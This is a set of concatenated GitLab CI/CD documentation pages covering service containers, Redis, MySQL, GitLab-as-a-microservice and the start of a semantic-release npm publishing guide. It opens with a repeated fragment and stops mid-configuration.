service-redis ``` This forcefully (`-f`) removes the `build` container, the service container, and all volumes (`-v`) that were created with the container creation. ## Security when using services containers Docker privileged mode applies to services. This means that the service image container can access the host system. You should use container images from trusted sources only. ## Shared `/builds` directory The build directory is mounted as a volume under `/builds` and is shared between the job and services. The job checks the project out into `/builds/$CI_PROJECT_PATH` after the services are running. Your service might need to access project files or store artifacts. 
If so, wait for the directory to exist and for `$CI_COMMIT_SHA` to be checked out. Any changes made before the job finishes its checkout process are removed by the checkout process. The service must detect when the job directory is populated and ready for processing. For example, wait for a specific file to become available. Services that start working immediately when launched are likely to fail, as the job data may not be available yet. For example, containers use the `docker build` command to make a network connection to the DinD service. The service instructs its API to start a container image build. The Docker Engine must have access to the files you're referencing in your Dockerfile. Hence, you need access to the `CI_PROJECT_DIR` in the service. However, Docker Engine does not try to access it until the `docker build` command is called in a job. At this time, the `/builds` directory is already populated with data. The service that tries to write the `CI_PROJECT_DIR` immediately after it started might fail with a `No such file or directory` error. In scenarios where services that interact with job data are not controlled by the job itself, consider the [Docker executor workflow](https://docs.gitlab.com/runner/executors/docker.html#docker-executor-workflow).
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Services
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

When you configure CI/CD, you specify an image, which is used to create the container where your jobs run. To specify this image, you use the `image` keyword.

You can specify an additional image by using the `services` keyword. This additional image is used to create another container, which is available to the first container. The two containers have access to one another and can communicate when running the job.

The service image can run any application, but the most common use case is to run a database container, for example:

- [MySQL](mysql.md)
- [PostgreSQL](postgres.md)
- [Redis](redis.md)
- [GitLab](gitlab.md) as an example for a microservice offering a JSON API

Consider that you're developing a content management system that uses a database for storage. You need a database to test all features in the application. Running a database container as a service image is a good use case in this scenario. Use an existing image and run it as an additional container instead of installing `mysql` every time you build a project.

You're not limited to only database services. You can add as many services as you need to `.gitlab-ci.yml` or manually modify the [`config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). Any image found at [Docker Hub](https://hub.docker.com/) or your private container registry can be used as a service.

For information about using private images, see [Access an image from a private container registry](../docker/using_docker_images.md#access-an-image-from-a-private-container-registry).
Services inherit the same DNS servers, search domains, and additional hosts as the CI container itself.

## How services are linked to the job

To better understand how container linking works, read [Linking containers together](https://docs.docker.com/network/links/).

If you add `mysql` as a service to your application, the image is used to create a container that's linked to the job container. The service container for MySQL is accessible under the hostname `mysql`. To access your database service, connect to the host named `mysql` instead of a socket or `localhost`. Read more in [accessing the services](#accessing-the-services).

## How the health check of services works

Services are designed to provide additional features which are **network accessible**. They may be a database like MySQL, or Redis, and even `docker:dind`, which allows you to use Docker-in-Docker (DinD). It can be practically anything that's required for the CI/CD job to proceed, and is accessed by network.

To make sure this works, the runner:

1. Checks which ports are exposed from the container by default.
1. Starts a special container that waits for these ports to be accessible.

If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`. This issue can occur because:

- There is no opened port in the service.
- The service was not started properly before the timeout, and the port is not responding.

In most cases it affects the job, but there may be situations when the job still succeeds even if that warning was printed. For example:

- The service was started shortly after the warning was raised, and the job is not using the linked service from the beginning. In that case, when the job needed to access the service, it may have been already there waiting for connections.
- The service container is not providing any networking service, but it's doing something with the job's directory (all services have the job directory mounted as a volume under `/builds`). In that case, the service does its job, and because the job is not trying to connect to it, it does not fail.

If the services start successfully, they start before the [`before_script`](../yaml/_index.md#before_script) runs. This means you can write a `before_script` that queries the service.

Services stop at the end of the job, even if the job fails.

## Using software provided by a service image

When you specify the `service`, this provides **network accessible** services. A database is the simplest example of such a service.

The services feature does not add any software from the defined `services` images to the job's container.

For example, if you have the following `services` defined in your job, the `php`, `node` or `go` commands are **not** available for your script, and the job fails:

```yaml
job:
  services:
    - php:7
    - node:latest
    - golang:1.10
  image: alpine:3.7
  script:
    - php -v
    - node -v
    - go version
```

If you need to have `php`, `node` and `go` available for your script, you should either:

- Choose an existing Docker image that contains all required tools.
- Create your own Docker image, with all the required tools included, and use that in your job.
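Because services start before `before_script` runs, one way to act on the health-check advice above is to probe the service yourself before the main script starts. A hedged sketch — the image, default alias, and test command here are illustrative assumptions, not taken from this page:

```yaml
test:
  image: redis:latest            # assumed image that ships redis-cli
  services:
    - redis:latest               # reachable under the default alias "redis"
  before_script:
    - redis-cli -h redis ping    # fails fast if the service never came up
  script:
    - make test                  # hypothetical test command
```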
## Define `services` in the `.gitlab-ci.yml` file

It's also possible to define different images and services per job:

```yaml
default:
  before_script:
    - bundle install

test:2.6:
  image: ruby:2.6
  services:
    - postgres:11.7
  script:
    - bundle exec rake spec

test:2.7:
  image: ruby:2.7
  services:
    - postgres:12.2
  script:
    - bundle exec rake spec
```

Or you can pass some [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options) for `image` and `services`:

```yaml
default:
  image:
    name: ruby:2.6
    entrypoint: ["/bin/bash"]
  services:
    - name: my-postgres:11.7
      alias: db,postgres,pg
      entrypoint: ["/usr/local/bin/db-postgres"]
      command: ["start"]
  before_script:
    - bundle install

test:
  script:
    - bundle exec rake spec
```

## Accessing the services

If you need a WordPress instance to test API integration with your application, you can use the [`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your `.gitlab-ci.yml` file:

```yaml
services:
  - tutum/wordpress:latest
```

If you don't [specify a service alias](#available-settings-for-services), when the job runs, `tutum/wordpress` is started. You have access to it from your build container under two hostnames:

- `tutum-wordpress`
- `tutum__wordpress`

Hostnames with underscores are not RFC valid and may cause problems in third-party applications.

The default aliases for the service's hostname are created from its image name, following these rules:

- Everything after the colon (`:`) is stripped.
- Slash (`/`) is replaced with double underscores (`__`) and the primary alias is created.
- Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is created.

To override the default behavior, you can [specify one or more service aliases](#available-settings-for-services).

### Connecting services

You can use inter-dependent services with complex jobs, like end-to-end tests where an external API needs to communicate with its own database.
For example, for an end-to-end test for a front-end application that uses an API, and where the API needs a database:

```yaml
end-to-end-tests:
  image: node:latest
  services:
    - name: selenium/standalone-firefox:${FIREFOX_VERSION}
      alias: firefox
    - name: registry.gitlab.com/organization/private-api:latest
      alias: backend-api
    - name: postgres:14.3
      alias: db,postgres
  variables:
    FF_NETWORK_PER_BUILD: 1
    POSTGRES_PASSWORD: supersecretpassword
    BACKEND_POSTGRES_HOST: postgres
  script:
    - npm install
    - npm test
```

For this solution to work, you must use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job).

## Passing CI/CD variables to services

You can also pass custom CI/CD [variables](../variables/_index.md) to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. For more information, read about [`.gitlab-ci.yml` defined variables](../variables/_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file).

```yaml
# The following variables are automatically passed down to the Postgres container
# as well as the Ruby container and available within each.
variables:
  HTTPS_PROXY: "https://10.1.1.1:8090"
  HTTP_PROXY: "https://10.1.1.1:8090"
  POSTGRES_DB: "my_custom_db"
  POSTGRES_USER: "postgres"
  POSTGRES_PASSWORD: "example"
  PGDATA: "/var/lib/postgresql/data"
  POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums"

default:
  services:
    - name: postgres:11.7
      alias: db
      entrypoint: ["docker-entrypoint.sh"]
      command: ["postgres"]
  image:
    name: ruby:2.6
    entrypoint: ["/bin/bash"]
  before_script:
    - bundle install

test:
  script:
    - bundle exec rake spec
```

## Available settings for `services`

| Setting | Required | GitLab version | Description |
|---------|----------|----------------|-------------|
| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. If the full image name includes a registry hostname, use the `alias` option to define a shorter service access name. For more information, see [Accessing the services](#accessing-the-services). |
| `entrypoint` | no | 9.4 | Command or script to execute as the container's entrypoint. It's translated to the Docker `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint) directive, where each shell token is a separate string in the array. |
| `command` | no | 9.4 | Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/reference/dockerfile/#cmd) directive, where each shell token is a separate string in the array. |
| `alias` | no | 9.4 | Additional aliases to access the service from the job's container. Multiple aliases can be separated by spaces or commas. For more information, see [Accessing the services](#accessing-the-services). Using an alias as a container name for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab Runner 17.9. For more information, see [Using aliases as service container names for the Kubernetes executor](#using-aliases-as-service-container-names-for-the-kubernetes-executor). |
| `variables` | no | 14.5 | Additional environment variables that are passed exclusively to the service. The syntax is the same as [Job Variables](../variables/_index.md). Service variables cannot reference themselves. |
| `pull_policy` | no | 15.1 | Specify how the runner pulls Docker images when it executes a job. Valid values are `always`, `if-not-present`, and `never`. Default is `always`. For more information, see [`services:pull_policy`](../yaml/_index.md#servicespull_policy). |

## Starting multiple services from the same image

Before the new extended Docker configuration options, the following configuration would not work properly:

```yaml
services:
  - mysql:latest
  - mysql:latest
```

The runner would start two containers, each using the `mysql:latest` image. However, both of them would be added to the job's container with the `mysql` alias, based on the [default hostname naming](#accessing-the-services). This would end with one of the services not being accessible.

After the new extended Docker configuration options, the previous example would look like this:

```yaml
services:
  - name: mysql:latest
    alias: mysql-1
  - name: mysql:latest
    alias: mysql-2
```

The runner still starts two containers using the `mysql:latest` image, however now each of them is also accessible with the alias configured in the `.gitlab-ci.yml` file.

## Setting a command for the service

Let's assume you have a `super/sql:latest` image with some SQL database in it. You would like to use it as a service for your job. Let's also assume that this image does not start the database process while starting the container. The user needs to manually use `/usr/bin/super-sql run` as a command to start the database.

Before the new extended Docker configuration options, you would need to:

- Create your own image based on the `super/sql:latest` image.
- Add the default command.
- Use the image in the job's configuration.

- `my-super-sql:latest` image's Dockerfile:

  ```dockerfile
  FROM super/sql:latest
  CMD ["/usr/bin/super-sql", "run"]
  ```

- In the job in the `.gitlab-ci.yml`:

  ```yaml
  services:
    - my-super-sql:latest
  ```

After the new extended Docker configuration options, you can set a `command` in the `.gitlab-ci.yml` file instead:

```yaml
services:
  - name: super/sql:latest
    command: ["/usr/bin/super-sql", "run"]
```

The syntax of `command` is similar to [Dockerfile `CMD`](https://docs.docker.com/reference/dockerfile/#cmd).
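The default hostname rules from the Accessing the services section can be sketched in a few lines of Python. This is an illustrative model of the stated rules, not GitLab Runner's actual implementation:

```python
def default_aliases(image):
    """Derive the default service hostnames from an image name.

    Illustrative sketch of the documented rules: strip everything
    after the colon, then replace "/" with "__" (primary alias)
    and with "-" (secondary alias).
    """
    name = image.split(":")[0]
    primary = name.replace("/", "__")
    secondary = name.replace("/", "-")
    # Images without a slash produce a single alias.
    return (primary, secondary) if "/" in name else (primary,)
```

For example, `default_aliases("tutum/wordpress:latest")` returns `("tutum__wordpress", "tutum-wordpress")`, matching the two hostnames listed earlier.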
## Using aliases as service container names for the Kubernetes executor

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab and GitLab Runner 17.9.

{{< /history >}}

You can use service aliases as service container names for the Kubernetes executor. GitLab Runner names containers based on the following conditions:

- When multiple aliases are set for a service, the service container is named after the first alias that:
  - Isn't already used by another service container.
  - Follows the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
- When aliases can't be used to name a service container, GitLab Runner falls back to the `svc-i` pattern.

The following examples illustrate how aliases are used to name service containers for the Kubernetes executor.

### One alias per service

In the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine
    - name: mysql:latest
      alias: mysql
```

The system creates a job Pod with containers named `alpine` and `mysql` in addition to the standard `build` and `helper` containers. These aliases are used because they:

- Are not used by another service container.
- Follow the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).

However, in the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: mysql:lts
      alias: mysql
    - name: mysql:latest
      alias: mysql
```

The system creates two more containers named `mysql` and `svc-0` in addition to the `build` and `helper` containers. The `mysql` container corresponds to the `mysql:lts` image, while the `svc-0` container corresponds to the `mysql:latest` image.
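The naming rules described above can be modeled with a short Python sketch. This is an illustrative approximation of the documented behavior (with a simplified DNS-label check), not GitLab Runner's code:

```python
import re

# A DNS label: lowercase alphanumerics and dashes, starting and ending
# with an alphanumeric character (simplified Kubernetes constraint).
DNS_LABEL = re.compile(r"^[a-z0-9]([-a-z0-9]*[a-z0-9])?$")

def service_container_names(services):
    """services: one alias list per service, in declaration order.

    Returns the container name chosen for each service: the first alias
    that is unused and DNS-valid, otherwise the svc-i fallback.
    """
    used = set()
    names = []
    fallback = 0
    for aliases in services:
        chosen = next(
            (a for a in aliases if a not in used and DNS_LABEL.match(a)),
            None,
        )
        if chosen is None:
            chosen = f"svc-{fallback}"
            fallback += 1
        used.add(chosen)
        names.append(chosen)
    return names
```

Applied to the second example above, `service_container_names([["mysql"], ["mysql"]])` returns `["mysql", "svc-0"]`.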
### Multiple aliases per service

In the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine,alpine-latest
    - name: alpine:edge
      alias: alpine,alpine-edge,alpine-latest
```

The system creates two more containers in addition to the `build` and `helper` containers:

- `alpine`, which corresponds to the container with the `alpine:latest` image.
- `alpine-edge`, which corresponds to the container with the `alpine:edge` image (the `alpine` alias being already used for the previous container).

In this example, the alias `alpine-latest` is not used.

However, in the following `.gitlab-ci.yml` file:

```yaml
job:
  image: alpine:latest
  script:
    - sleep 10
  services:
    - name: alpine:latest
      alias: alpine,alpine-edge
    - name: alpine:edge
      alias: alpine,alpine-edge
    - name: alpine:3.21
      alias: alpine,alpine-edge
```

Three more containers are created in addition to the `build` and `helper` containers:

- `alpine`, which refers to the container with the `alpine:latest` image.
- `alpine-edge`, which refers to the container with the `alpine:edge` image (the `alpine` alias being already used for the previous container).
- `svc-0`, which refers to the container with the `alpine:3.21` image (the `alpine` and `alpine-edge` aliases being already used for the previous containers).

The `i` in the `svc-i` pattern does not indicate the service's position in the provided list. Instead, it represents the service's position when no available alias is found.

When an invalid alias is provided (one that doesn't meet the Kubernetes constraints), the job fails with the following error (example with the alias `alpine_edge`). This failure occurs because aliases are also used to create local DNS entries on the job Pod.

```plaintext
ERROR: Job failed (system failure): prepare environment: setting up build pod: provided host alias alpine_edge for service alpine:edge is invalid DNS. a lowercase RFC 1123 subdomain must consist of lower case alphanumeric characters, '-' or '.', and must start and end with an alphanumeric character (e.g. 'example.com', regex used for validation is '[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*'). Check https://docs.gitlab.com/runner/shells/index.html#shell-profile-loading for more information.
```

## Using `services` with `docker run` (Docker-in-Docker) side-by-side

Containers started with `docker run` can also connect to services provided by GitLab. If booting a service is expensive or time consuming, you can run tests from different client environments, while booting the tested service only once.

```yaml
access-service:
  stage: build
  image: docker:20.10.16
  services:
    - docker:dind                  # necessary for docker run
    - tutum/wordpress:latest
  variables:
    FF_NETWORK_PER_BUILD: "true"   # activate container-to-container networking
  script: |
    docker run --rm --name curl \
      --volume "$(pwd)":"$(pwd)" \
      --workdir "$(pwd)" \
      --network=host \
      curlimages/curl:7.74.0 curl "http://tutum-wordpress"
```

For this solution to work, you must:

- Use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job).
- Not [use the Docker executor with Docker socket binding](../docker/using_docker_build.md#use-docker-socket-binding). If you must, then in the previous example, instead of `host`, use the dynamic network name created for this job.

## How Docker integration works

The following is a high-level overview of the steps performed by Docker during job time:

1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`.
1. Create a cache container to store all volumes as defined in `config.toml` and the `Dockerfile` of the build image (`ruby:2.6` as in the previous examples).
1. Create a build container and link any service container to the build container.
1. Start the build container, and send a job script to the container.
1. Run the job script.
1. Check out code in: `/builds/group-name/project-name/`.
1. Run any step defined in `.gitlab-ci.yml`.
1. Check the exit status of the build script.
1. Remove the build container and all created service containers.

## Capturing service container logs

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/3680) in GitLab Runner 15.6.

{{< /history >}}

Logs generated by applications running in service containers can be captured for subsequent examination and debugging. View service container logs when a service container starts successfully but causes job failures due to unexpected behavior. The logs can indicate missing or incorrect configuration of the service in the container.

`CI_DEBUG_SERVICES` should only be enabled when service containers are being actively debugged, as there are both storage and performance consequences to capturing service container logs.

To enable service logging, add the `CI_DEBUG_SERVICES` variable to the project's `.gitlab-ci.yml` file:

```yaml
variables:
  CI_DEBUG_SERVICES: "true"
```

Accepted values are:

- Enabled: `TRUE`, `true`, `True`
- Disabled: `FALSE`, `false`, `False`

Any other values result in an error message and effectively disable the feature.

When enabled, logs for all service containers are captured and streamed into the job's trace log concurrently with other logs. Logs from each container are prefixed with the container's aliases, and displayed in a different color.

{{< alert type="note" >}}

To diagnose job failures, you can adjust the logging level in the service container for which you want to capture logs. The default logging level might not provide sufficient troubleshooting information.

{{< /alert >}}

{{< alert type="warning" >}}

Enabling `CI_DEBUG_SERVICES` might reveal masked variables. When `CI_DEBUG_SERVICES` is enabled, service container logs and the CI job's logs are streamed to the job's trace log concurrently.
This means that the service container logs might get inserted into a job's masked log. This would thwart the variable masking mechanism and result in the masked variable being revealed.

{{< /alert >}}

See [Mask a CI/CD variable](../variables/_index.md#mask-a-cicd-variable).

## Debug a job locally

The following commands are run without root privileges. Verify that you can run Docker commands with your user account.

First start by creating a file named `build_script`:

```shell
cat <<EOF > build_script
git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner
cd /builds/gitlab-org/gitlab-runner
make runner-bin-host
EOF
```

Here we use as an example the GitLab Runner repository, which contains a Makefile, so running `make` executes the target defined in the Makefile. Instead of `make runner-bin-host`, you could run the command that is specific to your project.

Then create a service container:

```shell
docker run -d --name service-redis redis:latest
```

The previous command creates a service container named `service-redis` using the latest Redis image. The service container runs in the background (`-d`).

Finally, create a build container by executing the `build_script` file we created earlier:

```shell
docker run --name build -i --link=service-redis:redis golang:latest /bin/bash < build_script
```

The previous command creates a container named `build` that is spawned from the `golang:latest` image and has one service linked to it. The `build_script` is piped using `stdin` to the bash interpreter, which in turn executes the `build_script` in the `build` container.

Use the following command to remove containers after testing is complete:

```shell
docker rm -f -v build service-redis
```

This forcefully (`-f`) removes the `build` container, the service container, and all volumes (`-v`) that were created with the container creation.

## Security when using services containers

Docker privileged mode applies to services. This means that the service image container can access the host system. You should use container images from trusted sources only.

## Shared `/builds` directory

The build directory is mounted as a volume under `/builds` and is shared between the job and services. The job checks the project out into `/builds/$CI_PROJECT_PATH` after the services are running. Your service might need to access project files or store artifacts. If so, wait for the directory to exist and for `$CI_COMMIT_SHA` to be checked out. Any changes made before the job finishes its checkout process are removed by the checkout process.

The service must detect when the job directory is populated and ready for processing. For example, wait for a specific file to become available. Services that start working immediately when launched are likely to fail, as the job data may not be available yet.

For example, containers use the `docker build` command to make a network connection to the DinD service. The service instructs its API to start a container image build. The Docker Engine must have access to the files you're referencing in your Dockerfile. Hence, you need access to `CI_PROJECT_DIR` in the service. However, Docker Engine does not try to access it until the `docker build` command is called in a job. At this time, the `/builds` directory is already populated with data. A service that tries to access `CI_PROJECT_DIR` immediately after it starts might fail with a `No such file or directory` error.

In scenarios where services that interact with job data are not controlled by the job itself, consider the [Docker executor workflow](https://docs.gitlab.com/runner/executors/docker.html#docker-executor-workflow).
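A service entrypoint can implement the wait described above by polling the shared volume. A minimal sketch, assuming the service only needs the checkout to exist before it starts working (the function name and the final service command are hypothetical):

```shell
#!/bin/sh
# Poll the shared /builds volume until the job's checkout has produced
# a .git directory; only then is it safe to process project files.
wait_for_checkout() {
  dir="$1"
  until [ -d "$dir/.git" ]; do
    sleep 1
  done
}

# Example (hypothetical service entrypoint):
# wait_for_checkout "/builds/$CI_PROJECT_PATH"
# exec my-service --project-dir "/builds/$CI_PROJECT_PATH"
```

Waiting for a sentinel file written by the job's own script works the same way; polling is crude but avoids any coupling between the service image and the runner's checkout timing.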
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using Redis
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Because many applications depend on Redis as their key-value store, you may need it to run your tests.

## Use Redis with the Docker executor

If you are using [GitLab Runner](../runners/_index.md) with the Docker executor, you basically have everything set up already.

First, in your `.gitlab-ci.yml` add:

```yaml
services:
  - redis:latest
```

Then you need to configure your application to use the Redis database, for example:

```yaml
Host: redis
```

And that's it. Redis is now available to be used in your testing framework.

You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/_/redis). For example, to use Redis 6.0 the service becomes `redis:6.0`.

## Use Redis with the Shell executor

Redis can also be used on manually configured servers that are using GitLab Runner with the Shell executor.

In your build machine, install the Redis server:

```shell
sudo apt-get install redis-server
```

Verify that you can connect to the server with the `gitlab-runner` user:

```shell
# Try connecting to the Redis server
sudo -u gitlab-runner -H redis-cli

# Quit the session
127.0.0.1:6379> quit
```

Finally, configure your application to use the database, for example:

```yaml
Host: localhost
```

## Example project

We have set up an [Example Redis Project](https://gitlab.com/gitlab-examples/redis) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md).

Want to hack on it? Fork it, commit, and push your changes. In a few moments, the changes are picked up by a public runner and the job begins.
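Putting the Docker executor pieces together, a job that smoke-tests the service before running the test suite could look like the following sketch. The job name, the choice of `redis:latest` as the job image (it ships `redis-cli`), and the smoke test itself are assumptions, not part of the example project:

```yaml
redis-smoke-test:
  image: redis:latest      # provides redis-cli in the job container
  services:
    - redis:latest         # reachable from the job under the host name "redis"
  script:
    - redis-cli -h redis ping   # a healthy service replies PONG
```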
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using MySQL
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Many applications depend on MySQL as their database, and you may need it for your tests to run.

## Use MySQL with the Docker executor

If you want to use a MySQL container, you can use [GitLab Runner](../runners/_index.md) with the Docker executor.

This example shows you how to set a username and password that GitLab uses to access the MySQL container. If you do not set a username and password, you must use `root`.

{{< alert type="note" >}}

Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md).

{{< /alert >}}

1. To specify a MySQL image, add the following to your `.gitlab-ci.yml` file:

   ```yaml
   services:
     - mysql:latest
   ```

   - You can use any Docker image available on [Docker Hub](https://hub.docker.com/_/mysql/). For example, to use MySQL 5.5, use `mysql:5.5`.
   - The `mysql` image can accept environment variables. For more information, view the [Docker Hub documentation](https://hub.docker.com/_/mysql/).

1. To include the database name and password, add the following to your `.gitlab-ci.yml` file:

   ```yaml
   variables:
     # Configure mysql environment variables (https://hub.docker.com/_/mysql/)
     MYSQL_DATABASE: $MYSQL_DB
     MYSQL_ROOT_PASSWORD: $MYSQL_PASS
   ```

   The MySQL container uses `MYSQL_DATABASE` and `MYSQL_ROOT_PASSWORD` to set up the database. Pass these values by using [GitLab CI/CD variables](../variables/_index.md) (`$MYSQL_DB` and `$MYSQL_PASS` in the previous example), [rather than calling them directly](https://gitlab.com/gitlab-org/gitlab/-/issues/30178).

1. Configure your application to use the database, for example:

   ```yaml
   Host: mysql
   User: runner
   Password: <your_mysql_password>
   Database: <your_mysql_database>
   ```

   In this example, the user is `runner`. You should use a user that has permission to access your database.

## Use MySQL with the Shell executor

You can also use MySQL on manually configured servers that use GitLab Runner with the Shell executor.

1. Install the MySQL server:

   ```shell
   sudo apt-get install -y mysql-server mysql-client libmysqlclient-dev
   ```

1. Choose a MySQL root password and type it twice when asked.

   {{< alert type="note" >}}

   As a security measure, you can run `mysql_secure_installation` to remove anonymous users, drop the test database, and disable remote logins by the root user.

   {{< /alert >}}

1. Create a user by logging in to MySQL as root:

   ```shell
   mysql -u root -p
   ```

1. Create a user (in this case, `runner`) that is used by your application. Change `$password` in the command to a strong password. At the `mysql>` prompt, type:

   ```sql
   CREATE USER 'runner'@'localhost' IDENTIFIED BY '$password';
   ```

1. Create the database:

   ```sql
   CREATE DATABASE IF NOT EXISTS `<your_mysql_database>` DEFAULT CHARACTER SET `utf8`
   COLLATE `utf8_unicode_ci`;
   ```

1. Grant the necessary permissions on the database:

   ```sql
   GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, CREATE TEMPORARY TABLES, DROP, INDEX, ALTER, LOCK TABLES
   ON `<your_mysql_database>`.* TO 'runner'@'localhost';
   ```

1. If all went well, you can quit the database session:

   ```sql
   \q
   ```

1. Connect to the newly created database to check that everything is in place:

   ```shell
   mysql -u runner -p -D <your_mysql_database>
   ```

1. Configure your application to use the database, for example:

   ```yaml
   Host: localhost
   User: runner
   Password: $password
   Database: <your_mysql_database>
   ```

## Example project

To view a MySQL example, create a fork of this [sample project](https://gitlab.com/gitlab-examples/mysql). This project uses publicly available [instance runners](../runners/_index.md) on [GitLab.com](https://gitlab.com). Update the `README.md` file, commit your changes, and view the CI/CD pipeline to see it in action.
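Combining the Docker executor steps above, a minimal pipeline that verifies the service is reachable might look like the following sketch. The job name, the use of `mysql:latest` as the job image (it includes the `mysql` client), and the `SHOW DATABASES` check are assumptions; `$MYSQL_DB` and `$MYSQL_PASS` are CI/CD variables you define yourself:

```yaml
mysql-smoke-test:
  image: mysql:latest      # provides the mysql client in the job container
  services:
    - mysql:latest         # reachable from the job under the host name "mysql"
  variables:
    MYSQL_DATABASE: $MYSQL_DB
    MYSQL_ROOT_PASSWORD: $MYSQL_PASS
  script:
    - mysql --host=mysql --user=root --password="$MYSQL_PASS" --execute="SHOW DATABASES;"
```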
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use GitLab as a microservice
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Many applications need to access JSON APIs, so application tests might need access to APIs too. The following example shows how to use GitLab as a microservice to give tests access to the GitLab API.

1. Configure a [runner](../runners/_index.md) with the Docker or Kubernetes executor.
1. In your `.gitlab-ci.yml` add:

   ```yaml
   services:
     - name: gitlab/gitlab-ce:latest
       alias: gitlab

   variables:
     GITLAB_HTTPS: "false"             # ensure that plain http works
     GITLAB_ROOT_PASSWORD: "password"  # to access the api with user root:password
   ```

{{< alert type="note" >}}

Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md).

{{< /alert >}}

Then, commands in `script` sections in your `.gitlab-ci.yml` file can access the API at `http://gitlab/api/v4`.

For more information about why `gitlab` is used for the `Host`, see [How services are linked to the job](../docker/using_docker_images.md#extended-docker-configuration-options).

You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/u/gitlab).

The `gitlab` image can accept environment variables. For more details, see the [Linux package documentation](../../install/_index.md).
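Because the `gitlab/gitlab-ce` service can take several minutes to boot, a job usually has to poll before calling the API. A hypothetical job sketch — the job name, the `curlimages/curl` image, and the choice of `/api/v4/projects` as the polling endpoint are all assumptions:

```yaml
api-test:
  image: curlimages/curl:latest
  services:
    - name: gitlab/gitlab-ce:latest
      alias: gitlab
  variables:
    GITLAB_HTTPS: "false"
    GITLAB_ROOT_PASSWORD: "password"
  script:
    # Poll a public API endpoint until the service finishes booting.
    - until curl --silent --fail "http://gitlab/api/v4/projects" > /dev/null; do sleep 10; done
    # Call the API as root:password, per the service configuration above.
    - curl --silent --fail --user "root:password" "http://gitlab/api/v4/projects"
```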
---
stage: Package
group: Package Registry
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Publish npm packages to the GitLab package registry using semantic-release
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This guide demonstrates how to automatically publish npm packages to the [GitLab package registry](../../user/packages/npm_registry/_index.md) by using [semantic-release](https://github.com/semantic-release/semantic-release).

You can also view or fork the complete [example source](https://gitlab.com/gitlab-examples/semantic-release-npm).

## Initialize the module

1. Open a terminal and go to the project's repository.
1. Run `npm init`. Name the module according to [the package registry's naming conventions](../../user/packages/npm_registry/_index.md#naming-convention). For example, if the project's path is `gitlab-examples/semantic-release-npm`, name the module `@gitlab-examples/semantic-release-npm`.
1. Install the following npm packages:

   ```shell
   npm install semantic-release @semantic-release/git @semantic-release/gitlab @semantic-release/npm --save-dev
   ```

1. Add the following properties to the module's `package.json`:

   ```json
   {
     "scripts": {
       "semantic-release": "semantic-release"
     },
     "publishConfig": {
       "access": "public"
     },
     "files": [
       <path(s) to files here>
     ]
   }
   ```

1. Update the `files` key with glob patterns that select all files that should be included in the published module. More information about `files` can be found [in the npm documentation](https://docs.npmjs.com/cli/v6/configuring-npm/package-json/#files).
1. Add a `.gitignore` file to the project to avoid committing `node_modules`:

   ```plaintext
   node_modules
   ```

## Configure the pipeline

Create a `.gitlab-ci.yml` with the following content:

```yaml
default:
